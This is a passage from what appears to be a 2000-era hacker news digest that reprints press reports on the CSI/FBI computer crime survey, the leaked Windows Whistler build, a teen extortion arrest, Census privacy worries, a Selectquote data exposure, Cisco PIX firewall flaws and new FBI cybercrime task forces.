today that said that electronic crime cost companies at
least $266 million last year. The study found that 70%
of the responding companies detected the unauthorized
use of their computer systems in the last 12 months up
from 62% the year before. Insiders and disgruntled
employees topped the lists of worrisome security
threats. (One conclusion that can be drawn form this
study is that e-crime is on the rise, another is that
people are more willing to admit intrusions or that
detection of criminal activity has gotten better. The
numbers are interesting but really don't say anything.)

ZD Net
http://www.zdnet.com/zdnn/stories/news/0,4586,2471718,00.html?chkpt=zdnntop



Late Update 0943EST
An anonymous person was kind enough to send us a link
directly to the summary results of the above mentioned
survey.

Computer Security Institute
http://www.gocsi.com/prelea_000321.htm


ZDNet;

Report: 'E-crime is booming'

Some 70 percent of companies queried in a new study have detected attacks
on their networks, the FBI/CSI reports.


By Robert Lemos, ZDNet News UPDATED March 22, 2000 10:00 AM PT

SAN FRANCISCO -- Just like e-commerce, electronic crime is a booming
business, according to a survey released by the Computer Security
Institute and the San Francisco FBI Computer Intrusion Squad on Wednesday.
The study found that 70 percent of CSI's 585 member companies that
responded to its survey detected the unauthorized use of their computer
systems in the last 12 months -- up from 62 percent the year before.

"Isn't e-commerce booming? Then e-crime is booming," said Richard Power,
editorial director and analyst for the Computer Security Institute.

"The Internet revolution is going on regardless, but the more commerce
that goes online, the more crime that goes online as well."

While not a scientific estimate of computer crime, the report does measure
the anonymous admissions of more than 640 security professionals who are
part of CSI.

Insiders the biggest fear More than three-quarters of those
professionals identified hackers as a security threat, but insiders
concerned the respondents more, with 81 percent worried about disgruntled
employees.

CSI's Power explained that professional hackers are more of a threat,
however. "That's the real problem, not a juvenile hacker," he said. "The
point is, if a 16-year-old kid can do (what we have seen), then what are
the professionals doing?"

The report also indicates that corporate computer systems are far from
secure. Almost 90 percent of the security professionals who answered the
survey detected a security threat, which includes unauthorized access as
well as improper use of a corporate computer or e-mail and computer
viruses.

Of those intrusions, only 42 percent of the companies affected put a
dollar sign on the amount of damage done. The total: $266 million.

With only one computer security administrator per 1,000 computers, the
situation may not get any better soon.

-=-

CSI;

Mar 22,2000
FOR IMMEDIATE RELEASE
Contact: Patrice Rapalus, Director
Computer Security Institute
600 Harrison Street
San Francisco, CA 94107
415/905-2310
Internet: prapalus@cmp.com



Ninety percent of survey respondents detect cyber attacks, 273 organizations
report $265,589,940 in financial losses

SAN FRANCISCO -- The Computer Security Institute (CSI) announced today the
results of its fifth annual "Computer Crime and Security Survey." The
"Computer Crime and Security Survey" is conducted by CSI with the
participation of the San Francisco Federal Bureau of Investigation's (FBI)
Computer Intrusion Squad. The aim of this effort is to raise the level of
security awareness, as well as help determine the scope of computer crime
in the United States.

Highlights of the "2000 Computer Crime and Security Survey" include the
following:

Ninety percent of respondents (primarily large corporations and
government agencies) detected computer security breaches within the
last twelve months.

Seventy percent reported a variety of serious computer security
breaches other than the most common ones of computer viruses, laptop
theft or employee "net abuse"--for example, theft of proprietary
information, financial fraud, system penetration from
outsiders, denial of service attacks and sabotage of data or
networks.

Seventy-four percent acknowledged financial losses due to computer
breaches.

Forty-two percent were willing and/or able to quantify their
financial losses. The losses from these 273 respondents totaled
$265,589,940 (the average annual total over the last three years was
$120,240,180).

Financial losses in eight of twelve categories were larger than in any
previous year. Furthermore, financial losses in four categories were
higher than the combined total of the three previous years. For example,
6I respondents quantified losses due to sabotage of data or networks
for a total of $27,148,000. The total financial losses due to sabotage for
the previous years combined totaled only $10,848,850.

As in previous years, the most serious financial losses occurred through
theft of proprietary information (66 respondents reported $66,708,000) and
financial fraud (53 respondents reported $55,996,000).

Survey results illustrate that computer crime threats to large
corporations and government agencies come from both inside and outside
their electronic perimeters, confirming the trend in previous years.
Seventy-one percent of respondents detected unauthorized access by
insiders. But for the third year in a row, more respondents (59%) cited
their Internet connection as a frequent point of attack than cited their
internal systems as a frequent point of attack (38%).

Based on responses from 643 computer security practitioners in U.S.
corporations, government agencies, financial institutions, medical
institutions and universities, the findings of the "2000 Computer Crime
and Security Survey" confirm that the threat from computer crime and
other information security breaches continues unabated and that the
financial toll is mounting.

Respondents detected a wide range of attacks and abuses. Here are some
other examples:

25% of respondents detected system penetration from the outside.

27% of respondents detected denial of service attacks.

79% detected employee abuse of Internet access privileges
(for example, downloading pornography or pirated software,
or inappropriate use of e-mail systems).

85% detected computer viruses.

For the second year, we asked some questions about electronic commerce over
the Internet. Here are some of the results:

93% of respondents have WWW sites.

43% conduct electronic commerce on their sites (in 1999, only it was only 30%).

19% suffered unauthorized access or misuse within the last twelve months.

32% said that they didn't know if there had been unauthorized access or misuse.

35% of those acknowledging attack, reported from two to five incidents.

19% reported ten or more incidents.

64% of those acknowledging an attack reported Web-site vandalism.

60% reported denial of service.

8% reported theft of transaction information.

3% reported financial fraud.

Patrice Rapalus. CSI Director, suggests that the "Computer Crime and
Security Survey," now in its fifth year, has delivered on its promise to
raise the level of security awareness and help determine the scope of
crime in the United States.

"The trends the CSI/FBI survey has highlighted over the years are
disturbing. Cyber crimes and other information security breaches are
widespread and diverse. Ninety percent of respondents reported attacks.
Furthermore, such incidents can result in serious damages. The 273
organizations that were able to quantify their losses reported a total of
$265,589,940. Clearly, more must be done in terms of adherence to sound
practices, deployment of sophisticated technologies, and most importantly
adequate staffing and training of information security practitioners in
both the private sector and government."

Bruce J. Gebhardt is in charge of the FBI's Northern California office.
Based in San Francisco, his division covers fifteen counties, including
the continually expanding "Silicon Valley" area. Computer crime is one of
his biggest challenges.

"If the FBI and other law enforcement agencies are to be successful in
combating this continually increasing problem, we cannot always be placed
in a reactive mode, responding to computer crises as they happen. The
results of the CSI/FBI survey provide us with valuable data. This
information not only has been shared with Congress to underscore the need
for additional investigative resources on a national level but identifies
emerging crime trends and helps me decide how best to proactively, and
aggressively assign resources, before those 'trends' become 'crises.'"

###

CSI, established in 1974, is a San Francisco-based association of
information security professionals. It has thousands of members worldwide
and provides a wide variety of information and education programs to
assist practitioners in protecting the information assets of corporations
and governmental organizations.

The FBI, in response to an expanding number of instances in which
criminals have targeted major components of information and economic
infrastructure systems, has established the National Infrastructure
Protection Center (NIPC) located at FBI headquarters and the
Regional Computer Intrusion Squads located in selected offices throughout
the United States. The NIPC, a joint partnership among federal agencies
and private industry, is designed to serve as the government's lead
mechanism for preventing and responding to cyber attacks on the nation's
infrastructures. (These infrastructures include telecommunications,
energy, transportation, banking and finance, emergency services and
government operations). The mission of Regional Computer Intrusion Squads
is to investigate violations of Computer Fraud and Abuse Act (Title 8,
Section 1030), including intrusions to public switched networks, major
computer network intrusions, privacy violations, industrial espionage,
pirated computer software and other crimes

Copyright 2000
Computer Security Institute
600 Harrison Street
San Francisco, CA 94107
Telephone: (415) 905-2626
Fax: (415) 905-2218.



@HWA


58.0 HNN:Mar 22nd:The Next Version of Windows Leaked
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/


contributed by Evil Wench
While Windows 2000 only just recently shipped Microsoft
is already working on the next generation of the
operating system. Code named Whistler, build 2211.1
has been liberally spread around pirate sites across the
net.

Beta News
http://betanews.efront.com/article.php3?sid=953595359


ZD Net
http://www.zdnet.com/zdnn/stories/news/0,4586,2471310,00.html?chkpt=zdnntop


Beta;

Whistler Hits the Web
By Nate Mook, eFront March 20th, 2000, 6:35 PM

An internal build of Microsoft's future operating system, set to combine
consumer and business versions into a product currently codenamed Whistler
Windows 2001, has leaked out onto the Internet. Build number 2211.1
was posted onto various college and Internet sites early this morning and
spread as per usual, like wildfire.

While the new operating system currently looks almost identical to Windows
2000, a number of people who installed the leaked build stated there were
a few HTML enhancements to folders, simplifying things for novice
users. For example, the control panel is now by default an HTML interface,
offering access to a few basic configuration options.

Whistler does contain the infamous MarsCore.DLL file which started rumors
last month regarding the purpose of Mars, now known to be part of the
future version of Microsoft's MSN client. However, it is unknown
whether or not the new HTML folders are part of the Mars core or if users
will be given the opportunity to switch off more user friendly parts of
the operating system.

As usual with an early Alpha release, most new features and enhancements
will not be added until Beta 1. Keep checking back for continued coverage
regarding Microsoft Whistler.

ActiveWin contributed to this report.

-=-

ZDNet;

Windows 2001 leaked on the Web

A pirated version of Windows 2001 is winding its way across the Net. And
it looks a lot like today's Windows.

By Mary Jo Foley, ZDNet News UPDATED March 21, 2000 2:03 PM PT

Microsoft Corp.'s next full-fledged version of Windows, code-named
Whistler, is at least a year away from release -- but already a pirated
version of one of the latest builds has found its way onto the Net.

As reported by the Windows enthusiast sites ActiveWin and BetaNews, a
recent internal build of Whistler has been posted illegally to a number of
college and Internet sites.

ActiveWin and BetaNews are reporting that Build 2211.1 was posted Tuesday
morning and "spread as per usual, like wildfire."

Whistler is the code name for the first full-fledged upgrade to Windows
2000 that will be based on the Windows NT kernel, rather than the Windows
9X kernel. (The Windows 9X update is code-named Millennium and expected to
ship in the third or fourth quarter of this year.) Whistler is tentatively
slated to ship in March 2001, according to internal Microsoft documents.

Microsoft (Nasdaq: MSFT) won't comment on where Whistler is in the
development process. But sources close to the company say the latest
"stable" internal developers build is numbered 2207. The most recent
internal test build is 2214, sources add.

A Microsoft spokesman said the company was investigating reports of
pirated Whistler builds but would make no further comment.

Looks like Win2000 -- so far As noted by ActiveWin, the pirated
Whistler build looks almost identical to Windows 2000 Professional.

"A number of people who installed the leaked build stated there were a few
HTML enhancements to folders, simplifying things for novice users,"
ActiveWin reported. "For example, the control panel is now by default an
HTML interface, offering access to a few basic configuration options."

One change under the hood, according to ActiveWin, is the inclusion of the
MarsCore.DLL file. "Mars" is the code name for user interface technology
slated to be included in a future version of Microsoft's MSN client. At
one point, Mars was used as the code name for the next version of a
consumer-oriented version of Internet Explorer. After signing up Mars beta
testers last fall, Microsoft sent out a note telling testers it had
delayed the start of the beta because the company was "rethinking some of
our most basic assumptions" regarding the future user interfaces.

It isn't just in the user interface that Microsoft has been redrawing its
Windows road map.

In January, Microsoft acknowledged that it had tabled work on "Neptune," a
consumer version of Windows slated to follow Millennium, and on "Odyssey,"
an NT-kernel-based follow-on to Windows 2000. Instead, Microsoft said, it
planned to merge the Neptune and Odyssey code bases in the form of
Whistler.

The follow-on to Whistler, code-named Blackcomb, is expected to ship in
2002 or later.


@HWA


59.0 HNN:Mar 22nd:Toronto Business Held For Extortion
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/


contributed by Evil Wench
An unnamed business in the Toronto area was held for
ransom of less than $5,000 after a 14 year old youth
took control of the companies chat-room and email
servers. Police arrested the individual after arranging a
meeting to deliver the money. The youth has been
charged with extortion, mischief to data, fraudulently
possessing a computer password, production and
possession of counterfeit money, and two counts of
unauthorized use of a computer. (And they say there
are not enough computer crime laws.)

National Post
http://www.nationalpost.com/news.asp?f=991222/158060&s2=national&s3=news

Wednesday, December 22, 1999

14-year-old computer whiz
charged after company given
extortion demand
Arrested in Keswick

Chris Eby
National Post

A 14-year-old computer whiz, who allegedly hacked into the
accounts of a downtown Toronto business and tried to extort the
owners, was charged yesterday with a raft of extortion and
counterfeiting-related offences after a police sting operation.

The boy, who cannot be named under the Young Offenders Act,
took control of the business's e-mail and chat rooms -- two
operations vital to the business' survival -- for two weeks. He
contacted the owner of the business through the Internet, demanding
cash before he returned control of the accounts.

"He obviously displays a capability in computers that appears to be
above average," said Detective Myron Demkiw. "They're pretty
serious offences ... this is all relatively new ground for everybody."

The owner of the business contacted police, who traced the suspect
to Keswick, a town 60 kilometres north of Toronto.

Investigators arranged a meeting on Monday where the suspect was
supposed to receive the money he was demanding (a sum less than
$5,000 was all police would say), and was arrested.

"He was calm throughout," Det. Demkiw said of the youth.

As a result of the investigation, detectives executed a search warrant
on the boy's home and seized his computer, related documents, and
some counterfeit money.

When asked if he had ever come across anything like this, Det.
Demkiw replied: "No, never, and and this will be something new to
the courts as well."

The youth has been charged with extortion, mischief to data,
fraudulently possessing a computer password, production of
counterfeit money, and two counts each of unauthorized use of a
computer, and possession of counterfeit money.

@HWA

60.0 HNN:Mar 22nd:Is the Census Secure?
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by Evil Wench
The long form of the US Census has sparked privacy
concerns ever since it was introduced in 1960. With the
increased awareness of computer security and identity
theft those fears are even greater. Some residents fear
giving out their personal information on the off chance
that it may be stolen or otherwise fall into the wrong
hands. The Census Bureau has taken some solace in the
fact that it has never suffered a computer related
break-in.

Philidelphia Inquirer
http://www.phillynews.com/inquirer/2000/Mar/21/front_page/PCENSUS21.htm


Census queries raising computer-security questions

New inquiries strike some as an opening to hackers or invasions of privacy.
Bureau officials say fears could reduce responses.

By Thomas Ginsberg
INQUIRER STAFF WRITER

Betty McAdams is afraid computer hackers could steal her personal information.
Joe Alessandroni figures marketers somehow will buy his. Entire Web sites
question the government's right to the data at all.

In the last two weeks, about 15 million Americans began receiving the most
intrusive government questionnaire most will ever fill out. The "Long
Form" from the U.S. Census Bureau - 37 pages filled with 53 questions
about everything from language skills to toilets - is prompting some
recipients to squeal about invasion of privacy, a complaint that has
arisen every decade since the long form was launched in 1960.

This year, however, Census officials and privacy experts said they detect
a more pointed fear: concern about computer security. The growth of the
Internet since the 1990 Census along with high-profile attacks on Web
sites such as Yahoo have exacerbated already-rising concerns about the
safety of any information on any computer anywhere.

"Alarmed is a good word," said McAdams, 51, of Philadelphia, an assistant
director of Greater Philadelphia First, an alliance of business executives
in the region. "I assume they're going to compile all this information on
a computer somewhere. . . . Probably if [computer hacking] had not
happened so recently, I might not be as alarmed."

To increasing numbers of people, the country is facing a "privacy
Chernobyl," said Robert R. Belair, a Washington-based privacy lawyer and
editor of a national newsletter on business privacy. "It doesn't surprise
me that the Census Bureau is going to have more trouble this year than
before."

Unfortunately, some salient facts get lost in the din: The Census Bureau
has never suffered a computer-related security breach, experts agree.

Its computers are kept separate from other government systems, and
respondents' names are separated from personal data when the results are
eventually compiled into databases, Census officials say.

Moreover, since the 1930s, the Census Bureau, backed by the U.S. Supreme
Court, has jealously guarded its records; in 1942, it even rebuffed a
demand from the U.S. War Department for information on potential draftees.

Census officials, for their part, take the once-a-decade privacy
complaints in stride as they collect the statistics for use in redrawing
congressional districts and determining federal funding formulas.

Questions about household income, for example, are used to estimate the
number of subsidized lunches the neighborhood school might have to
provide.

This year's new question about whether a resident provides primary care
for a grandchild is linked to welfare allocations.

Maury Cagle, a bureau spokesman, said that even though the agency's
confidentiality record is clean, "people have an ingrained suspicion about
computers and private information. All of those things add to the falling
response rate."

The Census Bureau projects its response rate for the 2000 Census will hit
its lowest level ever: 61 percent, down from 75 percent in 1980.

As the response rate drops, the government has to hire ever more
head-counters - "enumerators," in bureau jargon - to brave back streets
and barking dogs to get the information personally.

This year, the Census Bureau is mounting a $230 million outreach campaign
designed to raise the response rate and keep down the expense of
enumerators.

Still, "people are a little more testy" about giving out personal
information than in years past, said Gorden DeJong, director of
Pennsylvania State University's Population Research Institute.

DeJong and others blame everything: a spate of high-profile computer
attacks; rising concerns about confidentiality; a constant if sometimes
fluctuating distrust of government; and an ever-widening flood of private
surveys and junk mail with which Americans already contend.

"For the number of things I get in the mail, I already must be on 50
lists," said Alessandroni, 84, a retired lawyer from Philadelphia. "It's
pretty obvious to me that there's no such thing as secrecy. . . . The
information is bound to get around."

In the last two weeks, either the long form or a separate three-page short
form was mailed to 113 million households.

An additional 22 million households with incomplete addresses or post
office boxes were having their forms hand-delivered. Households that don't
return the form by April 1 may get a visit from an enumerator.

Every sixth household got a long form. The ratio was set by a scientific
sampling formula, and people may not fill out a long form unless they were
selected, said Phillip Lutz, assistant regional manager for the Census
region comprising Pennsylvania, New Jersey, Maryland, Delaware, and
Washington.

Each form arrives bearing the bold-faced words: "Your Response is Required
by Law." What is not written is the fact that the $100 fine for failing to
respond - a fine dating to at least 1954 - apparently has not been imposed
in decades, even though federal courts have upheld the constitutionality
of the participation law.

"We're not interested in fining people. We're interested in collecting
information," Lutz said.

Still, some people are willing, even eager, to pay the fine rather than
give up personal information.

"I wrote the number of people living in my house and enclosed a $100
check," said a 41-year-old participant in an Internet chat room about the
Census, who spoke on condition that only his first name, Greg, be printed.
"Why is it any of their business how I am paying or have paid for my
home?"

So far, the refusers appear to be in the minority. State and local
officials across the country have joined with community and immigrant
groups to push for full participation, arguing that the sacrifice pays off
in federal funding.

Pennsylvania officials have estimated that each person counted in
Philadelphia is worth an average of $2,200 in federal funds.

"The very people who are not participating need to be counted so they can
have government services in their neighborhood," said Kate Kunda, 45, a
Spanish teacher from Wayne, Delaware County.

As for herself, Kunda added: "I was annoyed that they wanted to know about
my electricity bill and mortgage, but we did make an effort to fill it
out."



@HWA

61.0 HNN:Mar 23rd:Insurance Co. Reveals Personal Info on Web
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by acopalyse
A software glitch allowed visitors to Selectquote.com to
view the personal information of the previous visitor. At
least 20 users had everything from name and address to
current insurance coverage and parents health histories
revealed.

MSNBC
http://www.msnbc.com/news/385464.asp?0m=T12R

Insurance site exposes personal data
Glitch on Selectquote site reveals information to next user
By Mike Brunker
MSNBC

March 22 — Consumers who requested online life
insurance quotes from Selectquote.com on
Tuesday and Wednesday got more than they
bargained for: Thanks to a software glitch, their
personal information was left on the company’s
Web site for the next user to see.

THE PROBLEM occurred when a form that
consumers fill out to request a quote failed to clear the
contents at the end of the process. This left everything from
the previous user’s name and address to information on
current coverage and parents’ health histories plainly visible
to the next person to request a quote.
Lyle Griffin, a spokesman for Selectquote, said the
problem occurred when programmers fixed a piece of code
on the site that was causing a problem for users with an
older version of Internet Explorer. Unfortunately, the fix
created a problem in the quote request form, he said.
The problem lasted from 4 p.m. PT on Tuesday until
about 10 a.m. PT Wednesday, but it affected only about 20
users who were directed to a newly designed Selectquote
site that is still being tested, Griffin said.
.Not to minimize it,. he said of the problem.
.Obviously this is extremely embarrassing..

MSNBC.com was alerted to the problem late
Tuesday by a prospective Selectquote customer,
who was outraged that other visitors to the site
were able to view her personal information.


.About 10 minutes (after filling out the form) I got a call
from a woman in Ohio who said, ‘I’m just someone who’s
on Selectquote and all your information is prepopulated in
the questionnaire,’. said Ona Karasa of Bellevue, Wash.
She said she went back on the site Wednesday
morning and saw the information of two other people who
apparently had just requested life-insurance quotes using the
online service. MSNBC editors also were able to access
personal information entered by other users until
midmorning Wednesday.

Another user, Richard Underwood of Rockville, Md.,
said he was alerted to the problem early Wednesday by
e-mail from another Selectquote surfer. He said a company
representative had called and left a message concerning his
request for a quote, but did not mention the Web site
problem.
.Truthfully, I don’t know if I want to talk to anyone at
Selectquote about life insurance at this point,. he said.
Underwood said the experience would likely make him
pause the next time he is prompted to enter personal
information on a Web site.
.I was just getting to the point where I was reasonably
comfortable doing that, but I may have to think twice if this
is how it works,. he said.


@HWA


62.0 HNN:Mar 23rd:Cisco Admits to Big Hole in PIX Firewall
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/


contributed by acopalyse
Last week Cisco admitted that it is possible to fool the
PIX stateful inspection into opening up arbi

  
trary TCP
ports, which could allow attackers to circumvent
defined security policies. The vulnerabilities effect any
PIX firewall that has enabled FTP which is turned on by
default.

Vnunet
http://www.vnunet.com/News/601083

Networking » John Leyden, Network News [22 Mar 2000]

Cisco admits to serious PIX firewall flaw


Cisco last week admitted that two security vulnerabilities
affecting its PIX firewalls could leave corporate networks
open to attack.

In an interim security notice, the vendor acknowledged the
existence of two related vulnerabilities that both cause its
Secure PIX Firewalls to interpret FTP (File Transfer Protocol)
commands out of context, leaving the networks behind the
firewalls open to penetration.

Cisco said that in certain configurations "it is possible to fool
the PIX stateful inspection into opening up arbitrary TCP
ports, which could allow attackers to circumvent defined
security policies".

All Cisco Secure PIX Firewalls with software versions up to
and including 4.2(5), 4.4(4), and 5.0(3), that are configured
to provide access to FTP services, are at risk from both
vulnerabilities. Cisco admitted that the problem means any
Cisco Secure PIX Firewall that has enabled the fix-up
protocol FTP command could allow unauthorised data to
reach the network it is designed to protect.

Deri Jones, managing director of security tester NTA Monitor,
described the issue as "serious", particularly because Cisco's
offering is currently the third most popular firewall in the
market.

"To Cisco's credit it has issued a bulletin, but has not yet
found any solutions. This will not be trivial to address and
may take it some time," warned Jones.

Clive McCafferty, managing director of security consultant
CenturyCom, said that many users, which include BT, use
Cisco's PIX firewalls for managed services.

"This could allow an attacker to send spurious stuff and then
launch an attack when a port is open," said McCafferty.

The first vulnerability, which remains unfixed, is exercised
when a client inside the firewall browses to an external
server and selects a link that the firewall interprets as two or
more FTP commands. The client begins an FTP connection as
expected, and at the same time unexpectedly executes
another command opening a separate connection through
the firewall.

The only solution Cisco currently suggests for this problem is
disabling incoming FTP services. Any server that permits
internal clients to make arbitrary outbound FTP connections
may be vulnerable to this issue.

The second, related problem is exercised when the firewall
receives an error message from an internal FTP server
containing an encapsulated command that the firewall
interprets as a distinct command. This can be exploited to
open a separate connection through the firewall.

Both vulnerabilities are due to the command fix-up protocol
FTP (portnum), which is enabled by default on the Cisco
Secure PIX Firewall. To exploit the security flaws, attackers
must be able to make connections to an FTP server
protected by the PIX Firewall.

» If you would like to comment on this article email us @
newseditor@vnunet.com


@HWA


63.0 HNN:Mar 23rd:College To Offer Online Crime Fighting Courses
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by Lew
A new state-of-the-art computer lab was unveiled by
officials at the College of DuPage in Illinios on Monday at
the college's Suburban Law Enforcement Academy. The
lab will offer police officers (no civilians allowed) courses
in reconstructing an electronic crime scene, as well as
how to present such evidence in court. The lab, valued
at $250,000, was donated by Microsoft Corp. and Omni
Tech Corp.

Chicago Tribune - Registration Required
http://chicagotribune.com/news/metro/dupage/article/0,2669,SAV-0003210202,FF.html
<bleh>

@HWA


64.0 HNN:Mar 23rd:Pittsburgh Gets Computer Crime Task Force
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/


contributed by acopalyse and Evil Wench
A joint operation of federal and local authorities named
the Pittsburgh High Tech Computer Crimes Task Force
will try to help in the fight against cyber crime. The
Task Force was announced on Tuesday at the
Pittsburgh FBI offices.

Pittsburgh Tribune
http://www.triblive.com/digage/dfbi0323.html

Pittsburgh Post Gazette
http://www.post-gazette.com/regionstate/20000322cybercrime1.asp

Tribune;

FBI installs new task force aimed at fighting cybercrimes

By Erik Siemers
TRIBUNE-REVIEW

The aqua Macintosh G3 computer, its electronic guts
exposed, appeared harmless as it sat on a table in the
Pittsburgh FBI offices Tuesday.

But its hard drive tells investigators a different story - it
was used to print counterfeit corporate checks.

That Macintosh is one of the computers under
examination by the Pittsburgh High Tech Computer
Crimes Task Force.

The medley of federal and local authorities trained to
investigate computer-related crimes was unveiled
yesterday

The task force, one of the first in the nation, pools
experts from local agencies such as Pittsburgh police
with federal agencies such as the Secret Service and the
Internal Revenue Service into one room to combat the rapid growth of cybercrimes.

"Crimes we couldn't have conceived years ago are now routine," said U.S. Attorney Harry S.
Litman, whose office is involved in the task force. "It is critical that we respond to these crimes by
marshaling our resources."

Western Pennsylvania is open to crimes such as hacker attacks and "a whole array of Internet
fraud," partly because it has more software development firms than Silicon Valley, Litman said.

"Our position poses significant vulnerability to cybercrimes," Litman said.

The task force will be free to use each agency's resources along with those at Carnegie Mellon's
Computer Emergency Response Team, said Richard D. Pethia, manager of CERT's networked
systems survivability program. CERT will provide technical assistance to the task force, Pethia said.

Each agency offers one representative to the task force who has been trained in forensic
examinations of computers, said Dan Larkin, supervisor in charge of the FBI's White Collar and
Computer Crimes Division.

Aside from providing intelligence and technical assistance to computer investigations, the task force
will focus on investigations where the Internet was used as the main tool in committing the crime.

Michael Vatis, director of the FBI's National Infrastructure Protection Center in Washington, D.C.,
said all FBI field offices will eventually house task forces similar to Pittsburgh's.

Pittsburgh is one of the initial task force sites partly because "we have a wealth of talent," said John
P. Joyce, assistant special agent in charge of the FBI's Pittsburgh office.

The city also has a good track record for law enforcement agencies working with each other and
with Carnegie Mellon's technology resources, said FBI Special Agent Bill Crowley.

Task force members will use traditional investigation skills along with advanced knowledge of
technology to crack computer cases, said Vatis.

"We need to have the technology to get the digital evidence," Vatis said.

Getting that digital evidence can be as simple as copying the contents of the hard drive for analysis
on its own computers, said Special Agent Tom Hyslip, the Secret Service's representative to the
task force.

"When we go to court we can say we never touched (the evidence)," Hyslip said.

-=-

Gazette;

City at forefront of war on cybercrime

FBI forming task forces to fight crimes of Internet age

Wednesday, March 22, 2000

By Torsten Ove, Post-Gazette Staff Writer

With its aging population and Rust Belt image, Pittsburgh may hardly seem
like the kind of town the federal government would choose as a base for its
war on sophisticated cybercrime.

But yesterday, as local law enforcement officers stood stiffly for the cameras
at FBI headquarters Downtown, authorities announced the creation of the
nation's first task force specifically designed to combat computer intrusion,
Web site vandalism, on-line espionage and other crimes of the rapidly
evolving Internet age.

"This is the future, but it is also very much the present," said Michael Vatis, the
FBI's top cybercop. "This is putting Pittsburgh at the cutting edge of
cybercrime prevention."

The task force, comprised of federal, state and local agencies, is one of 16
planned nationwide in major cities.

Pittsburgh was chosen because of the prevalence of software development
companies here and the presence of Carnegie Mellon University's Computer
Emergency Response Team, the nation's leading cybercrime research facility.

In addition to focusing on complex computer and Internet crimes, FBI officials
said the local task force will provide technical assistance to police
departments in investigations of fraud, child pornography and identity theft that
involve computers.

Vatis, director of the National Infrastructure Protection Center in Washington,
D.C., said computers are changing the face of crime so quickly that law
enforcement agencies have to work together to keep up.

In addition to working to combat large-scale attacks such as the one that
disabled Yahoo!, eBay and other e-commerce Web sites last month, federal
authorities have been scrambling to head off all manner of computer crimes,
from organized hacking of government computers by suspected foreign agents
to amateur vandalism such as that committed by the teen-ager who vandalized
an anti-drug Web site with pictures of Beavis and Butthead.

Locally, FBI Special Agent John P. Joyce said his agency is investigating 30
to 40 cases of computer intrusion and similar crimes, although he wouldn't
reveal details of any of them. Because of their technical nature, each
investigation requires much more expertise than the traditional capers tackled
by FBI agents of old. The new breed of federal crime fighter is more likely to
be an agent sitting at a computer all day than a suit-and-tie swashbuckler with
a gun kicking down doors.

"These cases are a lot more complicated than physical crime," said Vatis, "and
they take a longer time to solve."

Richard D. Pethia of CMU's CERT warned that the "denial of service"
attacks that knocked the Internet companies off-line in February are only the
beginning of new waves of cyberspace assaults. In 1998, he said, his center
examined 4,000 incidents. Last year, the number reached 8,000. This year, it
could double again.

"This problem is real and it's here," he said. "The nasty thing about computer
attacks is that they can be launched from anywhere on the planet."

And it can be nearly impossible to track down the culprits and then prove
they are responsible for specific on-line exploits. The attacks on the
e-commerce companies, for example, remain unsolved, although Vatis said
the FBI is making progress in the case.

Not everyone is convinced the federal government, working with experts in
the private sector, has what it takes to match wits with serious hackers bent
on mayhem.

"If I were a cyber criminal with the FBI after me, I would sleep like a baby,"
said Jay Valentine, president of InfoGlide Corp., an Internet security
company, in a recent Scripps Howard report about Internet security. "Even a
blind squirrel finds a nut, but the FBI will only catch amateurish hackers. The
best ones are a generation ahead of the FBI."

Other critics have blasted the FBI and the National Infrastructure Protection
Center for reacting too slowly to the attacks on 30 university systems last year
that laid the groundwork for the e-commerce shutdown last month.

In a USA Today report, experts -- many of them cybersleuths selling their
services -- also said the government's efforts were hindered by inter-agency
squabbling and the fact that some companies don't trust the FBI enough to
share information with agents.

Vatis wouldn't address the USA Today report except to say that it was
inaccurate.

Regarding the charge of slow government reaction, he said the protection
center issued a warning about the denial-of-service threat in plenty of time.

The National Infrastructure Protection Center's Web site shows the warning
went out on Dec. 30 and included detailed information about what defensive
steps to take.

Still, Vatis acknowledged that government agencies are "still in the process of
getting up to speed."



@HWA

65.0 HNN:Mar 23rd:Business May Be Protected Against FOIA
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/


contributed by acopalyse
To encourage companies to release information about
online attacks a new bill would provide firms with an
exemption to the Freedom of Information Act.
Representatives Tom Davis, R-Va. and Jim Moran, D-Va.
plan to introduce the bill later this week. It is hoped
that this exemption will promote the reporting of cyber
attacks by industry. (And at the same time erode
citizens rights.)

Newsbytes
http://www.newsbytes.com/pubNews/00/146086.html

Bill Would Protect Firms That Share Hacking Info


By David McGuire, Newsbytes WASHINGTON, DC, U.S.A., 21 Mar 2000, 6:00 AM
CST

A new bill aimed at encouraging companies to share information about
hacker attacks would provide firms with a limited exemption from the
Freedom of Information Act (FOIA).

Set to be introduced by Reps. Tom Davis, R-Va. and Jim Moran, D-Va., later
this week, the legislation would allow companies to share information
about cyberattacks with law enforcers and industry groups, without
worrying that such information could come back to haunt them, Davis
staffer David Marin said today.

"The public interest will be served by companies coming forth to share
their information" about attacks, Marin said. Too often now companies do
not report cyberattacks for fear that such reports will find their way
into the media, he said.

While the bill would create a limited shelter under FOIA, it is not
intended to allow companies to mask their business dealings, Marin said.

When the legislation is completed it will be "narrowly tailored to address
(information pertaining to) how the attack was done and what was done to
fix the attack," Marin said. The legislation will apply only to
telecommunications and information technology infrastructure attacks.

Used primarily by the media, FOIA allows members of the press and the
public to file legally binding requests for public documents.

FOIA already contains an exemption for ongoing criminal investigations, by
Davis and Moran are aiming to further protect firms that divulge
information about cyberattacks, Marin said.

Reported by Newsbytes.com, http://www.newsbytes.com .


@HWA


66.0 HNN:Mar 23rd:Teenagers To Receive Deterrent Sentences
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/


contributed by acopalyse
After selling stolen logon names and passwords three
teenagers in Hong Kong were warned by Magistrate Ian
